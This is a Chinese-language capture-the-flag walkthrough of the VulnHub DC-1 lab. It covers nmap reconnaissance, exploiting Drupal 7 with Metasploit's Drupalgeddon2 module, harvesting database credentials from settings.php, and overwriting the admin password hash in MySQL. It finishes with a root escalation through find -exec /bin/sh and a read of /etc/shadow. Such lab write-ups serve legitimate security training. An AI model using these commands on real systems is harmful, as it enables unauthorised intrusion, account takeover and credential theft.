DC-1靶场笔记

admin 2022年10月14日14:02:12安全文章评论40 views1423字阅读4分44秒阅读模式

0x00 环境搭建

虚拟机Kali:IP 192.168.123.5

DC-1靶场:

https://download.vulnhub.com/dc/DC-1.zip



0x01 渗透过程

1. 信息收集

探测目标IP地址

nmap 192.168.123.0/24

DC-1靶场笔记

探测目标IP开放端口

nmap -Pn -p 1-65535 192.168.123.29 -T4

DC-1靶场笔记

目标IP为192.168.123.29,开放了22、80、111、34902端口

网页信息收集

访问80端口

DC-1靶场笔记

CMS:Drupal 7

Web:

Apache 2.2.22

PHP 5.4.45

JavaScript 库:jQuery


2.漏洞查找与利用

先从CMS漏洞入手

msf搜索

DC-1靶场笔记

不知道哪个有效,全部试一遍。


3.Getshell

DC-1靶场笔记

尝试到,模块exploit/unix/webapp/drupal_drupalgeddon2 有效

DC-1靶场笔记

python -c 'import pty;pty.spawn("/bin/bash")'

成功getshell


4.数据库渗透

查看flag1.txt

DC-1靶场笔记

提示找配置文件,看了一下web.config没东西,进入sites文件夹

DC-1靶场笔记

翻到settings.php

flag2提示

DC-1靶场笔记

DC-1靶场笔记

数据库用户名:dbuser

数据库密码:R0ck3t


5.用户密码爆破

进入数据库

mysql -udbuser -pR0ck3t

查看数据库内容

show databases;

DC-1靶场笔记

进入drupal的数据库,查看表

use drupaldb;show tables;

DC-1靶场笔记

看users表的数据

select * from users;

DC-1靶场笔记

$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

密码被加密了,提示已经说了爆破是无解的,说明需要别的办法来得到密码。

一顿搜索,找到

DC-1靶场笔记

意思是,Drupal会利用password-hash.sh文件来完成密码的加密,想到可以用这个文件加密一个自己的密码然后替换数据库中的原始密码。

找到这个文件

DC-1靶场笔记

根据上面的方法

php scripts/password-hash.sh "admin"

DC-1靶场笔记

然后回到数据库更改hash值

update users set name='admin', pass='$S$DKn.g86HBpQPTBHcscSth6O7uJ7taJoxPVKzY6BfUFC/arFgLzw8' where uid=1;

DC-1靶场笔记

更改成功,可以登录。

DC-1靶场笔记

flag3

DC-1靶场笔记

DC-1靶场笔记

翻译出来更像谜语,关键词是“PERMS”“FIND”“-exec”,应该是提示查找什么文件,或者用-exec提权。


6.Linux提权

先看一下/etc/passwd,因为当前用户不是root,所以/etc/shadow是没有权限访问的。

DC-1靶场笔记

关键flag4,找一下。

find / -name flag4*

DC-1靶场笔记

DC-1靶场笔记

提示第5个flag在root目录里,再次说明需要提权。

利用find提权

find可以添加-exec参数来对查找的结果进行处理。

find "一个已经存在的文件" -exec "whoami" ;find "一个已经存在的文件" -exec "/bin/sh" ;

看一下flag4的权限

find "flag4.txt" -exec "whoami" ;

DC-1靶场笔记

是root权限,直接提权。

find "flag4.txt" -exec "/bin/sh" ;

得到最终flag

DC-1靶场笔记

最后,cat  /etc/shadow,看一下root的密码,加了密,破解不太可行,不试了,到此结束。

DC-1靶场笔记



- End -

原文始发于微信公众号(NS Demon团队):DC-1靶场笔记

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月14日14:02:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  DC-1靶场笔记 http://cn-sec.com/archives/1348512.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: